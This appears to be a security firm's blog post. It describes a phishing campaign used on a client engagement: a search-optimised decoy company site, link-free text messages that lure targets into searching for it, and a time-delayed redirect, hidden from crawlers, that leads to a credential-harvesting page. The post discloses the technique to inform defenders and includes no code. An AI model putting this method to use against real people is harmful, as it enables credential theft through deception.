If the Phish Won’t Go to You, You Can Surely Come to the Phish
Phishing is an age-old cyber-threat, and over the years businesses have been investing substantially in creating effective defenses against it. The war against phishing is waged on several fronts: emails hitting employees’ mailboxes are parsed by mail security products, there are advanced filtering technologies for web browsing, and there is non-stop user education. Even the mobile phone operators are now looking for HTTP links in messages and performing spam analysis on them. From email to text messages, organizations have keenly adapted to the shape-shifting nature of phishing attacks, employing sophisticated methods to fend off attempts to compromise their organizations.
However, adversaries evolve in step with standard defense mechanisms. We have recently used a new approach to phishing on a customer engagement, but it would be naïve to think that it is not also used by real-life attackers elsewhere. The attack harnesses an inherent human trait, curiosity, but in a novel way.
This time, the modus operandi subverts the conventional phishing playbook. We did make a couple of more “run-of-the-mill” phishing attempts on this engagement, but they were all blocked — either by technology or by highly trained users who would report the phish. So we decided to do something different. Rather than go after the targets with forceful phishing attempts, we used a ‘come to us’ strategy. Rather than reaching out, we left a breadcrumb trail for our targets to follow.
The cornerstone of this strategy is the creation of a decoy — a seemingly legitimate company with a carefully curated digital presence. Once set up, this entity is ready to ensnare unsuspecting victims and hit them with a time-delayed redirect embedded in the decoy’s client-side HTML on the main page that triggers under certain conditions to prevent it from being discovered by automated crawlers. Once triggered, the victim is sent to the credential collector page, but from a website they came to themselves, and as a result would have an inherent level of trust for. It’s notable that seems to work effectively despite the redirection pointing at a site that could be recognized as phishing, possibly because of employees being used to seeing corporate login prompts fairly often (e.g. for web proxy access).
The bait for this trap is a blend of intrigue and plausibility. We sent our targets text messages that we had designed to pique their interest, asking a simple question, but importantly containing no direct links, only a brief mention of the decoy. This omission of the links was a psychological nudge for the recipients to look for our decoy “company” online. This could potentially exploit a fundamental “cyber hygiene” practice: the encouragement of manual navigation to websites instead of clicking on links in unsolicited messages.
To ensure that the exploit will reach the targets, the fake company’s website was search engine-optimized (e.g. the fake business had a fairly unique name), making it a prominent fixture at the top of relevant search results.
The campaign yielded a rate of engagement that was significantly higher than what we expected, turning casual searches into a number of successful phishing instances.
This phishing approach circumvents established cyber defenses by tapping into natural curiosity, undermining technological safeguards without directly confronting them and underscores the fact that no protection measure is entirely foolproof. This is yet another reminder that while technology forms the first line of defense, continually educating users on recognizing and reporting new forms of subterfuge is equally critical.